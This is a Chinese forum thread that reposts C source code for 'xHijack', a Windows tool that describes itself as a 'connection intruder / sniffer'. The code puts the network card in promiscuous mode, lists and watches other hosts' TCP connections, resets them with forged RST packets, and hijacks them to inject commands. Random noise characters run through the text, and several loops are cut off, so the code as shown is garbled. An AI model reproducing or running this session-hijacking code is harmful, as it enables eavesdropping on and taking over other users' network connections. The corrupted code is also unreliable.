7 C% T4 `4 p+ ~0 u    case CTRL_BREAK_EVENT:
$ I. `+ n, b9 G2 S( x- e      //reset action all flag 2 a. k8 I) `+ o0 E7 D
      ResetActionAllFlag();
' J$ W5 O( n$ a- o& s0 g- _      break;
8 F) U; ]9 c+ }' K' M    case CTRL_C_EVENT: ( z# d. d; ?* K
      //terminate all thread & U' c7 M/ i8 O' t
      TerminateThread(g_hThread[0], 0); 7 b9 j3 y, z4 p( ^6 J, b
      TerminateThread(g_hThread[1], 0); * y: @: [% W: y
      TerminateThread(g_hThread[2], 0); 9 f: ?! ^) g' B; O# ~
      TerminateThread(g_hThread[3], 0);
. p/ L4 J6 ^# j' ^8 m& h      break; * g3 x- B+ V1 ~
    default: 3 ~  V: k6 _1 p4 E' F' _
      break; # P, {+ m" X2 X8 M
  }
# i& U' h) e+ A: ~  return TRUE; ( @/ \0 k9 V: ~
}
: x: u' a; B* {. K3 H
( h5 y# B, v% k//
0 s: }: l& M1 j+ l% v//功能:处理用户输入 5 g# [; f, L) B: g, y0 M  \+ _
// . A0 G( C* ]- W3 L# P% Y
DWORD GetConnNum(char *szStr, DWORD dwLen, DWORD *lpCommandPos) 4 h, ^7 G. `, a9 l6 p  J
{
- m$ r# {- n1 N, O0 e  DWORD  i;
) Q9 n/ C# }5 c& k! u4 K, W  char  szBuff[16];
0 l; C) r- ^! Y$ U  u2 f8 m$ r* d" n! N
  *lpCommandPos = 0; * @) ^6 D' G" w2 s5 I
  for(i=0; i<15, i代码比较乱 " ]  e) h; {% W+ ^3 @
//
! r; u' F4 L" U4 F/ hDWORD WINAPI InterfaceThread(LPVOID lp) , U* b3 I9 C* N4 M# d, c' N- E
{
$ v) P4 y7 T& V: u  char  szHelp[] =  "l\t\t<-- List all connections\n"
6 Y/ K' ?: A2 G1 l6 g            "r x\t\t<-- Reset the number x connection\n" 7 K, A$ m) @4 m/ K8 N! D3 L% B8 F
            "w x\t\t<-- Watch the number x connection\n" 1 B7 K' w8 J5 L. Q& \
            "h x command\t<-- Hijack the number x connection to execute command\n"
$ x0 B9 M* _. H3 q6 c& N            "[Note]\n" 4 d2 @+ F% Y2 c7 M9 l4 [
            "Ctrl+Break to clear all action\n"
/ \0 W( t# t6 ~9 \; q0 l            "Ctrl+C to exit\n"; 4 V& L8 m4 N- K* `- s
  char  szPrompt[] = "\nxHijack>"; 9 n! L* T+ C8 g" g  {; D
  char  szBuffer[128];
  B8 `2 ^* l0 L+ a/ @% R4 P7 h  [  DWORD  dwPos; ; e* _4 Z# r' v/ \' y
  PCONNINFO  pTmp;
$ L. K- `  y3 t- v8 i
, R: O8 z& f! {$ N1 X9 N  while(1)
* u/ f! u; ^: f; {8 B, |% q# @: t  { , ?! L3 M( T, E  Z: @" V' m
    gets(szBuffer);//不考虑buffer overflow ( W/ [2 r8 M; S1 x9 \7 u4 h
    switch(szBuffer[0]) , ]4 I% U! d0 m" h8 u* [$ F
    { * u+ U" Q& @  J4 a0 U! K. m
      case 'l': 3 ~5 p0 V6 p" y, Y* J$ h, g
      case 'L': % @' V2 ^3 U; o9 |1 b
        ListAllConnection();
5 S2 r' F/ d; `9 g3 N, ~+ u        break;
3 E' `7 m! G& c      case 'r':
) S2 D  O" W% z" g) K      case 'R':
: C& F' T$ j. x* \/ C7 d0 ^' M1 x, V        if(strlen(szBuffer) >2)
+ D3 V' b! O! ]: Z8 Q! \        { . j% y( B0 A) h2 E# _7 K
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
( \! h& t, v! D5 A7 {6 l          g_dwAction = ACTION_RESET;
8 n' ^: m5 c$ H        } 7 K" ]3 g# Z' o/ {$ E7 _& Z7 |
        else printf("%s", szHelp);
& ?  k$ p, z6 z$ _        break;
5 ?$ g' i' ~* q      case 'w':   x$ _2 p) p$ n9 G: Q( u3 U0 o
      case 'W':
5 ~4 |: h, y" k4 i% M$ ?& I" Z! ]        if(strlen(szBuffer) > 2)
: N4 b) S1 o* C: d. [        { 2 k& b6 w. V& w' s* Q. M% B1 }
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos);
! @/ Q; F+ Y+ m7 h/ B. b. L  T2 q          g_dwAction = ACTION_WATCH; 0 ]3 N+ [5 f5 f/ Y
        } 7 u( F; p. @# ^$ b5 `9 U" U
        else printf("%s", szHelp);
) x% S0 x& Q6 p* ~4 S7 j        break; - b/ y  Q- {! H' S& t5 P) ]
      case 'h':
! q8 J) F; O4 n) d: L6 a      case 'H'://h 1 xxx
; e& _$ E# s- K# p        if(strlen(szBuffer) > 5)
& h$ N- i8 u% h  \% |3 q        { 9 B/ T3 d5 M5 ]) U0 s" N
          g_dwCtrlConn = GetConnNum(&szBuffer[2], strlen(szBuffer) - 2, &dwPos); ) v! A9 M3 b* ?( d7 o! N! D4 C. E
          //如果command第一个字符是'或"
$ i1 I. C2 L- Z5 Z' V          if( (szBuffer[2+dwPos+1] == '\'') || (szBuffer[2+dwPos+1] == '\"') ) 7 @1 M8 t. E3 b1 C- m6 j
          {
/ N2 N6 ]' r5 l4 r6 e            strncpy(g_szCommand, &szBuffer[2+dwPos+1+1], sizeof(g_szCommand) - 3); 6 i+ ?# ?. v. T. |( W% S3 g
            g_szCommand[strlen(g_szCommand) - 1] = 0x0;//去掉最后一个'或" ! I8 o+ R2 T% s- E- n6 F9 v
          } + K5 k4 m$ M* v7 i% y
          else strncpy(g_szCommand, &szBuffer[2+dwPos+1], sizeof(g_szCommand) - 3); / X: N3 S1 K& B! g9 d6 h2 c1 T
          strcat(g_szCommand, "\x0D\x0A");
( [4 A. N# Q5 u3 N4 h5 ~8 [: M9 w          g_dwAction = ACTION_HIJACK;
! [& U7 A: V! Y. d% f  a* w- Q        } " W6 G/ `% a9 E0 A* i8 V% y
        else printf("%s", szHelp); ) G6 ?- m  W1 E: I& e5 s
        break;
( Y1 `1 N" u& q7 G$ u+ [2 a      default:
8 q" s) o1 o4 j: u        printf("%s", szHelp);
7 H" A! Q0 J5 Y+ _        break;
( [6 l! q: t* ^3 L' z) J* U" N/ G    }//end of switch
7 T% {5 A+ S, {: C4 X# Z  e    //find the specify ident's struct point 6 N% l+ E5 }  ^: g% B8 e5 X
    if( (g_dwCtrlConn) && (g_dwAction) )
; D& E$ }! q" j" k4 }    { 2 Z+ M. T" ], f# b
      g_pCurrCtrlConn = NULL; 0 h* K. u/ _6 u# ^9 m
      pTmp = g_pConnHead; * V- s0 Q9 p  e% r
      while(pTmp) ; @0 X3 d0 ~: T# T! y
      {
& e( @1 y& ?/ f6 ~& g- B: {        if((pTmp->ident == g_dwCtrlConn) && (pTmp->bActive) ) $ ~, Z) j) j4 c
        { & h* Q1 z7 ?, L( M: _8 l' @+ s7 p$ e$ F
          g_pCurrCtrlConn = pTmp;
6 r9 i& I' t7 W          break; 8 M% {0 ]9 c4 H0 y9 g" N
        }
* }" y0 b" q$ Y, L- Y        pTmp = pTmp->Next;
, I2 ~% a4 F1 }$ v& `      }
6 @; Z; W7 s( H* u7 {5 Z2 A: m      if(!g_pCurrCtrlConn)
7 T; ~% y# T: a( I6 L  Y' }: e9 q! |; o      {
1 f/ R: v& w$ p2 z' N# L' z: t        printf("Can't find the number %d connection.\n", g_dwCtrlConn); - |  \  p- \; k, @) G
        //reset action all flag 2 d* V" o- n  I: E% |0 u
        ResetActionAllFlag();       ' B  j& J. n0 s# Q7 d  k% |
      }
' V, F4 a+ B4 k! m' n! P: J    }   u# y8 v- @" f% n' S
    if(!g_dwCtrlConn) ResetActionAllFlag();
2 O; F& O* e& V1 M% a& q9 T    //显示当前用户所期望的动作 # S. L) b9 C* U) y
    printf("\nCurrentAction:");
  T" m" q" E, Z    switch(g_dwAction)
$ i8 N8 F6 C7 y* N: |3 ]% O    { 2 m% L- U- O* w0 ]. y$ k
      case ACTION_WATCH: ) W0 ]  M1 e% Q5 ^  X9 y/ s
        printf("ACTION_WATCH"); / A* K  U2 h/ Z% H8 D3 V: |
        break; 7 j' k- j% r% R8 h& w
      case ACTION_RESET:
$ }! Z% ~$ d+ Q" E* r+ y        printf("ACTION_RESET");
" O9 l6 P2 H' o* i" B8 U        break; " ]  R" o6 s: j8 E' l
      case ACTION_HIJACK: 2 ~7 a$ z9 ^/ ]# g/ m7 Z7 W
        printf("ACTION_HIJACK"); 8 Z5 u3 |! S0 ?
        break; % {$ H1 Q1 X$ `- r8 e( t# F; K
      default:
; a: w: v  N! S% V  b% T3 q        printf("ACTION_NONE");
- g- i, t8 j9 {: m        break;
& g$ m0 p: |! X# L4 S    } - p) A7 D: b& p% N7 {
    printf("\tCurrentCtrlConn:%d%s", g_dwCtrlConn, szPrompt); 4 }) x8 }8 ~4 [& w1 J6 F
  }//enf of while $ z  S4 K: @) m- c$ F- l
  return 0;
/ d0 e, h9 k2 @- W, h4 }}
作者: 韩冰    时间: 2004-11-21 01:46
// ! h4 z; E1 R( i. k! w3 W2 F8 [$ w //功能:列出当前所有连接 . f; Z1 Q- v( f; B* ] J // - v* `' s. b- M' ]0 t4 F0 x void ListAllConnection() 7 p: p8 }) r( x: K; x' Z { ) o P7 k% j$ O2 @" A3 N; d3 @& k PCONNINFO pTmp; " W' s, b1 c- Z SOCKADDR_IN saDest, saSource; . ]$ R! V P1 ?+ r2 y) A pTmp = g_pConnHead; 8 T1 i7 g1 r. T* O# k5 S2 {# j while(pTmp) $ K' f8 ^) o& F6 V- J { ( ~. r* z9 \1 Z9 q if(pTmp->bActive) 9 E) q$ N2 S' D { + ^* I6 R3 n! ~, x1 k) w# E saSource.sin_addr.s_addr = pTmp->dwServerIP; 9 s6 H; ]5 {9 }" d' I1 ?( z saDest.sin_addr.s_addr = pTmp->dwClientIP; ! K. q' p# T- G/ X printf("(%d) %s:%d <--> ", pTmp->ident, inet_ntoa(saSource.sin_addr), 4 y$ r2 ]3 g9 s; }2 } v' b ntohs(pTmp->uServerPort)); : c" m' E3 p" Y6 h, H printf("%s:%d\n", inet_ntoa(saDest.sin_addr), ntohs(pTmp->uClientPort)); 7 Z+ P# y, E( X2 S } - ~' s9 a( j5 K4 ?. g: z! y pTmp = pTmp->Next; ; `" C0 t( Q( n, b } 6 o$ U' B5 C/ z8 Z1 z; G" ?9 K0 d} . W' h& R8 k9 X$ a 7 e3 P( [" ~& j2 M/ d, f// 5 L. L3 ^! F3 r: ~* {//功能:初始化一些数据,取得指定网卡的MAC地址和所有IP地址 7 | D0 X5 A! `: K( @) G// 3 |0 i% ^; ]4 m J LPADAPTER InitAdapter() # Y4 ~6 |9 q7 d0 D- ~$ w{ + W: L1 ]' y4 l1 p ^! p3 e LPADAPTER lpAdapter; , @3 N8 ?8 r9 t! B" B i static char AdapterList[Max_Num_Adapter][1024]; 6 x! t9 K) \; J3 U, E5 E2 m char szSelectAdapterName[512]; 4 H6 o% ]( }" y; h. Q! X WCHAR AdapterName[2048]; 7 U" e) [+ r; D' Z: D. g, C5 } WCHAR *temp,*temp1; 2 }. U& v9 X4 C2 I ULONG AdapterLength = 1024; 5 R( V% J0 P1 q& A* \ int iAdapterNum = 0; . I+ h8 s% X: ] int iRetCode, i; $ r/ }. i4 R9 W( \) w int iAdapter = 0; , `; {0 y5 F) h4 \9 W ULONG ulLen = 0; & N2 Q V, ?+ a! D8 A0 x2 S( R DWORD dwRet; U7 i8 Q Z$ h% q/ S/ r PIP_ADAPTER_INFO pAdapterInfo = NULL, pTmp; 5 X) Q* h; m! U* p+ G: h PIP_ADDR_STRING pIPAddr; $ [: V U: f$ j$ D9 } a! u1 e3 ^6 @" Z% q //Get The list of Adapter # d2 L- _+ I" j) M6 ~5 H if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) / G# B- Y; f/ m { 5 E; Z" n& {. D! d4 K) u4 P% _: e printf("Unable to retrieve the list of the adapters!\n"); ) B; C, W) e( N# E: o return 0; 9 E2 z8 J- h) `/ f } " |4 R. Q0 h% {$ x( e temp = temp1 = AdapterName; $ c! V1 g; g5 B0 {( Q i = 0; $ r) [( s" |% U r |# @9 j while ((*temp != '\0')||(*(temp-1) != '\0')) 6 {: g, A3 n8 E { 6 G/ o1 _# s' C if (*temp == '\0') . B- y0 t1 c T; E& r6 T { 7 e2 ]2 ~' O. Q* N6 i& ? memcpy(AdapterList,temp1,(temp-temp1)*2); ; [+ E* z' w* R' l; s4 U printf("%d - %S\n", i+1, AdapterList); , ^- {. [! B& H( j temp1=temp+1; $ K1 z& @+ Z# Q* W i++; 5 F9 f) a2 \4 k' s } ! p. v, s2 x W. ~7 r: K temp++; : g7 J. O9 M" z, C( W5 \9 Q+ F2 m } # }2 k. @9 k T, n //choose adapter 0 }- F" x' j4 E0 H' G* Q while((iAdapter <= 0) || (iAdapter > i)) - D1 t* X, Y. P3 Y4 v. ~3 Q6 T8 { { , f5 O* ]0 H' F+ l: ?) \ printf("\nPlease choose your Adapter:"); 3 `. C" n+ t3 N7 A) R scanf("%1d", &iAdapter); 7 ]' e5 u9 ]) R; u2 M$ `* J5 ]: h } 1 Q1 u( D# D9 V printf("\n"); + u( o/ Z6 ?! I- B. ~ //---------------------------------------------// ! P! [( t! N6 R; h U t //这里调用iphlpapi来取得本地ip_addr和mac_addr . {' C- [; H: [3 } sprintf(szSelectAdapterName, "%S", AdapterList[iAdapter -1], sizeof(szSelectAdapterName)-1); / U( u# M' |% p! N/ ` dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); + I! ?7 U! @9 |2 i) J3 s$ w! X4 T" V: s5 B if(dwRet != ERROR_BUFFER_OVERFLOW) : l2 i+ g! p+ G# v { ( y# l$ e' v% b# t9 X6 q. Z printf("GetAdapterInfo error:%d\n", GetLastError()); 7 m, Z9 g1 ^% h" B return 0; * ?* v1 d! G# x' D } 1 J, s6 }2 i2 i7 d) G' {# s) ] pAdapterInfo = (PIP_ADAPTER_INFO)malloc(ulLen); + }1 W) r4 X+ O% x! o% O if(!pAdapterInfo) ! o% }4 I2 B1 F% @% F4 H { 1 K: S7 N- Z8 f7 N$ f) C" w3 }3 p) { printf("malloc memory for pAdapterInfo error:%d\n", GetLastError()); ! \2 O5 e) D+ B return 0; / T; O C# x* \+ D9 g } 2 R( e1 F9 D& [ dwRet = GetAdaptersInfo(pAdapterInfo, &ulLen); ! ?8 [2 {7 G1 u# u if(dwRet != ERROR_SUCCESS) ; Y& i( D" A4 j* z$ h { $ |; N8 ?6 M9 W9 s% |2 Y printf("GetAdapterInfo error:%d\n", GetLastError()); ) _ l" H5 o! G* S return 0; 1 X# `0 P+ |2 [8 w( E( T/ U } 6 }. v, A7 C% o+ b) f pTmp = pAdapterInfo; 7 E) j* y: ~1 y) `* a" O while(pTmp) $ ~: w7 n5 j {) g; o( H { + j* g$ n( C" J3 Q9 z7 ?2 P6 Z" r //字符匹配
作者: 韩冰    时间: 2004-11-21 01:46
if(strstr(szSelectAdapterName, pTmp->AdapterName)) 6 {) I6 l# R: u! W8 F { & V, u/ H4 G8 j! E% ?$ O5 R //found it,get own adapter mac address 8 @4 ^' o, j+ t- l- g7 q memcpy(g_szOwnMAC, pTmp->Address, 6); % u6 {+ P- y/ \( f1 D$ A //get ip address % O5 @' R! h( I) v! p: A/ E pIPAddr = &pTmp->IpAddressList; ! ?2 H- T4 `! t% @( M" Z! i while(pIPAddr) 2 G7 w$ w9 m3 N6 z9 C v { ( s' Y5 Q ~1 `5 ]1 v5 z, P6 v g_OwnIP[g_TotalIP++] = inet_addr((char *)&pIPAddr->IpAddress); + V; c" s* b' H$ {/ \ pIPAddr = pIPAddr->Next; ( Y+ J( @* U, L if(g_TotalIP >= Max_Num_IPAddr) break; . s" e0 L, x/ L/ W- ^% m0 p, D2 y/ m7 t } 0 r n8 g7 \9 K. g' C# P break; " P8 B2 Z Y6 r4 T3 i8 t- j: g } 7 s6 y9 \+ ~# h. t I, s% ?. J pTmp = pTmp->Next; # g7 a' I0 E3 p) M( E* J } " T. T# E* W/ K$ M* G3 m free(pAdapterInfo); * d4 B4 e1 B7 H2 ] //not found,return zero ( G8 ^4 U9 C3 b1 T- n if( (!pTmp) || (!g_TotalIP) ) return 0; ! A7 c& @% ~0 b' s. ~' { //---------------------------------------------// 0 Q1 M7 n$ R3 M. g d //open adapter 0 V! Z* z' t+ O8 z lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[iAdapter - 1]); * n$ }1 z& J8 @* Q if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) $ k! j1 y+ V0 I! c8 S, y6 ?/ q { 0 f, m, k) q0 _' X iRetCode = GetLastError(); 7 t7 r6 ~5 Z+ b/ g. C printf("Unable to open the driver, Error Code : %lx\n", iRetCode); z, ]+ [; g, f3 E5 B return 0; & t, `) M8 {( ~( \! [: v7 U% v } . T9 Z4 m0 t) ?$ b# `' M // set the network adapter in promiscuous mod 5 u$ |" ]1 |/ f) @; [3 q) m if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_PROMISCUOUS) == FALSE) 6 D, ]7 D0 a* r9 Y. T" {4 D { 3 X; @* \/ ?& v* D. E1 N printf("Warning: unable to set promiscuous mode!Try set ALL_LOCAL mode!\n"); 3 X5 ?% z; u/ P- ` N6 d2 P if(PacketSetHwFilter(lpAdapter, NDIS_PACKET_TYPE_ALL_LOCAL) == FALSE) " e, u+ J; k- x$ D/ x6 c { * ]& N4 @5 Y) C6 V& ~$ P2 E1 D printf("Unable to set ALL_LOCAL mode!\n"); : @& m: J, Z8 _& U- J1 a4 S" E return 0; $ I: ~2 k' i8 }4 X3 Q4 ?6 {5 r } 5 x6 |8 v+ X2 w6 X5 Q } ! v# U' \# M/ Z // set a 512K buffer in the driver 7 m+ p3 p C8 d: H$ H1 U if(PacketSetBuff(lpAdapter, 512000) == FALSE) # i0 N/ s; v/ S) r8 k# t$ p { ( g: V3 R2 {0 d6 F# u& C printf("Unable to set the kernel buffer!\n"); ; d) e2 z8 R& }7 [ C. ]) n return 0; + m$ o# [. a) M$ B9 i! n } . m4 J* V: z* N r // set a 1 second read timeout & M5 |, d% e. ]* W if(PacketSetReadTimeout(lpAdapter, 1000) == FALSE) 6 M, y5 S' q# [ printf("Warning: unable to set the read tiemout!\n"); , p( v# C. W& y6 ^- r2 y if(PacketSetNumWrites(lpAdapter, 1) == FALSE) ! t) x; ~6 p: Y0 Z/ C printf("warning: Unable to send more than one packet in a single write!\n"); $ R+ t& w9 {! X+ [6 L //设置发送的packet 4 F0 u) W6 a8 G3 }$ @0 N/ x( F1 p7 ]0 T g_lpSendPacket = PacketAllocatePacket(); / o! w* j2 v2 { b( D4 j2 y if(g_lpSendPacket == NULL) , N% S8 \4 s9 J) ~# C/ T0 M { ( b* z- _- m0 A: B# V printf("Error:failed to allocate the LPPACKET structure for send packet.\n"); . R8 C, O1 }( z. u6 J$ a return 0; * J! |) g. ]2 F, u } ) s/ n+ O& C6 p6 _ ZeroMemory(g_szSendPacketBuf, sizeof(g_szSendPacketBuf)); " [1 J1 [( T* C. N PacketInitPacket(g_lpSendPacket, g_szSendPacketBuf, 1514); * g4 r5 r# E5 E return lpAdapter; $ {- }2 ^" O9 b) h: [} : C: @% x% p( c3 ]6 c; p 2 s& N6 V1 G: W- h# } //功能:帮助信息 9 W8 f; A- W+ M3 x D! W4 K5 ~2 J void usage() 3 A! s q3 c' j1 O( E$ H{ " c4 z* D; A, u( O8 E( l/ q printf( "xHijack v1.0 -- multipurpose connection intruder / sniffer for windows 2000\n" " u! D ? D" q+ \1 {7 V- A "By eyas 2002/8/19\n" * }8 z* {0 s& Y. b) \2 S2 ^6 ] "http://www.ey4s.org\n" * ?6 }6 g$ [9 |" p) x2 {* j3 ^+ X "Thanks to Refd0m and shotgun\n\n" . U% t# d! ]. u' O/ t, d" j "Usage: xHijack ServerSide ClientSide\n\n"); ' D! @1 c; ~/ O1 u } / w/ s$ V, Q/ g3 ?. E 4 k. [& V! c, @, Z$ _) I4 y// : F5 y) g! l4 n* Y //功能:显示数据包的一些详细信息 6 K6 h) {6 J$ ~ Y/ R( R/ n// 7 U6 i6 q5 i4 { VOID ShowPacketMoreInfo(PTCPPACKET pTCPPacket, USHORT usDataLen, BOOL bDetail) 5 ?" B7 \+ S/ W' ]{ 0 I+ R' e* x- s# J: W SOCKADDR_IN saDest, saSrc; ) R2 Y7 ^3 l* z5 w+ f! N unsigned char FlagMask; ) s6 V* y' A+ i, E' M int i; " S( h( ~! F4 M% }& K 4 n5 t$ ^; h/ j6 t saDest.sin_addr.s_addr = pTCPPacket->iphdr.destIP; 0 W; c9 q" M; F1 K$ l saSrc.sin_addr.s_addr = pTCPPacket->iphdr.sourceIP; 4 h0 c) {1 _5 N/ R printf("\n%-15s:%-5d -> ", inet_ntoa(saSrc.sin_addr), ntohs(pTCPPacket->tcphdr.th_sport)); ' ]+ C" X& |( Z: W' n- a printf("%-15s:%-5d DataLen=%d ", inet_ntoa(saDest.sin_addr), 9 u% w+ J1 \6 n4 P( f ntohs(pTCPPacket->tcphdr.th_dport), usDataLen); ) ?1 k L/ a; i6 C g //display TCP flag 9 g0 H0 k$ H2 n7 z for( i=0, FlagMask=1; i<6; i++, FlagMask <<= 1) / Z2 [% C+ n# j T }6 i/ u { $ p: X2 H& N+ |1 g* m& I if((pTCPPacket->tcphdr.th_flag) & FlagMask) : L' v1 ]6 j& e1 \* Y printf("%c", g_szTcpFlag); 9 \; ^& K) c9 ^3 M9 Q5 z else printf("-"); 6 p7 r* b4 o2 y. L5 y } 0 o8 X3 l4 f! D: q' Z printf("\n"); ( O4 w8 F3 Q5 q! J4 D3 ^ //如有需要,可显示更多详细的信息 , _, x- j7 q6 U7 Z0 J* p5 u if(bDetail) 3 F4 |% ^- a# n/ o printf("SEQ=%.8X ACK=%.8X\n",ntohl(pTCPPacket->tcphdr.th_seq), ntohl(pTCPPacket->tcphdr.th_ack)); & E/ j+ l+ ~: M2 N} 2 X1 W$ ]' e+ J0 m & m" s0 R8 A. F q// - _) t4 r' F% g/ F# D1 I4 z; u//功能:处理收到的数据包(只分析本不属于自己的包),然后根据用户输入,完成各种功能 7 M: P, v# ]& O8 U0 i// 2 X& l6 i- I0 tDWORD WINAPI AnalysePacketsThread(LPVOID lp) + c. j1 l& w- [ e {% a' L8 q) k { % f! D+ n2 I0 J1 T. Q/ A3 l ULONG ulBytesReceived; $ {; t2 K1 O4 V USHORT usDataLen; ( Z' G% W% A7 F) P! A" m, v. j //USHORT usIPHeadLen, usTCPHeadLen; 3 P4 j7 v* N% V char *buf; * K4 k- M1 \- \* j3 Q0 I( B u_int off, i; 4 d n( ?& j- J7 ?' _ PTCPPACKET pTCPPacket; ! d: K; ^/ Q' B' q0 m5 D) r struct bpf_hdr *hdr; 9 g! p: B: R# b- ~- ?! [+ ?$ j LPPACKET lpRecvPacket; % m- d$ o' L: u3 z" P6 a/ j char szPacketBuf[256000], *pStr; 5 E, r! |' ]# z/ C BOOL bDeleteNode, bAddNew; 2 X: }" i# a/ | DWORD ident;//当前所处理的数据包,所属的连接的唯一标识 7 k! d2 R0 a7 R6 U BOOL bClientToServer;//数据包是否从客户端发送到服务器端 # R4 ]- H* W& H5 \ # I% q% z+ X* z2 |& b //设置接收的packet ' }6 ?9 ^& J+ v" m' H3 V( H lpRecvPacket = PacketAllocatePacket(); & B1 D; b# W, Q* u- k, C6 T if(lpRecvPacket == NULL) % ~2 {' M" U6 y3 ?3 c$ A { : @+ |( o* A5 e% @2 w( B; p printf("Error:failed to allocate the LPPACKET structure for recv.\n"); - d4 w& B$ K4 w) k return 0; * H' V' E* u* A2 u4 U } ( t4 U$ ^( A. G3 r$ h ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); ' D+ u$ B% v$ s* y# u PacketInitPacket(lpRecvPacket, szPacketBuf, 256000); ) B: ?/ o5 k) w! Y' y while(1) 7 l' x" ?5 [2 ^/ J { 7 v4 l& W/ k; M$ A9 X$ ^+ g$ v* d // capture the packets . T$ ^& ]$ V$ X5 j0 j( ^. R5 P if(PacketReceivePacket(g_lpAdapter, lpRecvPacket, TRUE) == FALSE) : C/ A2 {( ]+ |4 H/ Q- l4 l2 ?7 o { 1 o( t. v6 \) c9 {2 R) t9 | printf("Error: PacketReceivePacket failed.\n"); / F" M3 ]* w, d% y1 w2 T9 J break; & O. ]. B3 t P" {6 ]8 M/ T& a } 4 y2 J& I( g: O$ b* t; U ulBytesReceived = lpRecvPacket->ulBytesReceived; $ J7 F- r6 y8 X buf = lpRecvPacket->Buffer; " u/ G! c& W! f% h6 W/ I- c off = 0; ! H+ K: U# w- I$ B6 `# s while(off < ulBytesReceived) - Q& D( I, _! X { 4 H5 _. R* v& s4 |8 e hdr = (struct bpf_hdr *)(buf + off); $ m. h9 @0 u& V* G2 _ off += hdr->bh_hdrlen; ' ?/ C4 l O) j# @ pTCPPacket = (PTCPPACKET)(buf + off); 4 Q6 y2 F2 ~$ }- l1 a& ~, P- p off = Packet_WORDALIGN(off + hdr->bh_caplen); % b. S( s5 l# s //不需要处理自己发出的包(转发或本机发送的) % I1 p# ~/ S* I! G. V4 M2 T if(memcmp(pTCPPacket->ehhdr.SourceMAC, g_szOwnMAC, 6) == 0) continue; 0 c6 z7 L0 Q [: A0 n; }( o //检查是否IP包 . ^( ^6 Y9 G6 I. c if(pTCPPacket->ehhdr.EthernetType != htons(EPT_IP)) continue; # g, S/ s0 Q5 K! z/ t% x //检查是否TCP包 " }* d$ I, P4 F3 G# J( w- Z if(pTCPPacket->iphdr.proto != IPPROTO_TCP) continue; 6 h% a. s L4 T+ K; O$ y //也不处理DestIP是自己的包 & ?6 O+ D/ d' p9 r# G$ T9 b for(i=0; i
作者: 韩冰    时间: 2004-11-21 01:47
pTCPPacket-&gt;iphdr.sourceIP, pTCPPacket-&gt;tcphdr.th_sport, TRUE, FALSE); ) d% F  x; y/ x0 F2 m: a  ^
            //reset action flag
$ s& x; K# f/ l" n, p5 u+ w            ResetActionAllFlag();
" y$ ?# O1 s) f3 G          }
& O+ L- w  r0 T8 x          //start hijack % {$ a/ Z" A7 Y6 e9 p) n
          else if(g_dwAction == ACTION_HIJACK) % {* k% r" t6 b) c6 X$ x
          { 8 M/ D/ y, N( u/ x# x/ _
            //send rst packet to client % l4 j% B( z3 [, x
            SendRstPacket(pTCPPacket-&gt;tcphdr.th_ack, pTCPPacket-&gt;tcphdr.th_seq); 6 q3 t/ V0 j) \& D
            //send hijack packet to client
& W' j' N- h& K9 T7 {4 m* K. m            SendHiJackPacket(pTCPPacket);
2 `" u; S$ _- r' o& ?4 o            //reset action flag 3 R) ?6 @# g0 y  m  Y' C. w
            ResetActionAllFlag(); 5 Q0 T9 K4 b4 g+ v' E0 R
          }
" ~% k% O1 E) P& m$ W$ y0 B        } , O1 y; v/ {( K; O+ H
        //show the tcp data
1 P' T& w" K; g7 ?) d% B        if( (g_dwAction == ACTION_WATCH) &amp;&amp; (usDataLen) ) ) c, P9 w  t' U; r
        { " p" L  ^; \! [' n: Z1 N
          ShowPacketMoreInfo(pTCPPacket, usDataLen, FALSE); ' q$ `4 t$ k9 c
          //暂不考虑IP、TCP头不是20字节的情况
( X/ N8 r, C% I1 `& B, W7 d# u9 a          //pStr = (char *)pTCPPacket + sizeof(EHHDR) + usIPHeadLen + usTCPHeadLen;
6 N( g: S  g+ Z: @# M' u- h. l+ T          pStr = (char *)pTCPPacket + 54; 2 ^& q5 ]9 u0 |. H% a
          for(i=0; i        }
9 I$ w* e. }$ p3 h# [      } + z! v; z' S' X, F* t
      //debug output 2 L8 ^# B' F3 l1 n3 E7 K0 u  A4 e
      //ShowPacketMoreInfo(pTCPPacket, usDataLen, TRUE); & S" u4 ^! a! j+ y  l6 x
    }//end of analyse packets while + {: b- w' X  f
  }//end of recv packets while
: z. t' Z" P+ Q( ?  PacketFreePacket(lpRecvPacket); 6 @! T$ J1 P1 ^* ?! Z
  return 0;
& t, w$ N# c  y; v9 K3 k2 _2 X} - ]4 h1 M7 n5 `  R

: |$ U  m3 X5 p9 e6 V6 m) h3 e6 p0 a0 y0 N( {
//
  x+ j, W) c4 ]3 |5 Z//功能:操作记录所有连接信息的单向链表
+ z) M) b" I, G6 o+ V5 d- n//
0 O9 B, U" p) M' ~' n& zDWORD CtrlConnInfoLink(DWORD dwServerIP, USHORT uServerPort, DWORD dwClientIP, 8 v9 q6 I! @1 ~7 q& j4 q3 U
            USHORT uClientPort, BOOL bDelete, BOOL bAddNew)
# B' h" M% B% e# t$ q' s+ q9 K{
- @, @8 G9 _) ~  PCONNINFO  pNew, pTmp;
2 A& ^* w2 O+ F8 X2 _: [# h( t* Z* E2 _3 f5 |3 U& }
  pTmp = g_pConnHead; $ Y* w2 r7 E6 H; z5 R* Y
  while(pTmp)
2 F$ s! P3 L) V) w  { 4 v4 J9 K" k4 p$ V! D% J0 D$ s  p
    if(pTmp-&gt;bActive)
) Q7 P* G5 L9 G5 X' @! q/ L    { 3 @2 v  g: z  k7 s
      //found it 7 n3 Q: _* G* R$ N, E
      if( (pTmp-&gt;dwServerIP == dwServerIP) &amp;&amp; # n3 y0 S( P& f; B
        (pTmp-&gt;uServerPort == uServerPort) &amp;&amp; - @5 X! `! _1 p  a1 s+ V
        (pTmp-&gt;dwClientIP == dwClientIP) &amp;&amp; - p( E+ d5 ^" C3 G
        (pTmp-&gt;uClientPort == uClientPort) ) 3 v# Q2 v, N$ g" [- j
      {
' M1 T5 u! }' M+ d        if(bDelete) $ c1 M) m/ H8 |4 u5 @; k
        { 7 V7 C3 C1 Y' G
          pTmp-&gt;bActive = FALSE;
5 V, p; W# j' w- a* g; `# k/ E% {          return 0; ( u: M* a) s6 s4 d4 F( ~
        }
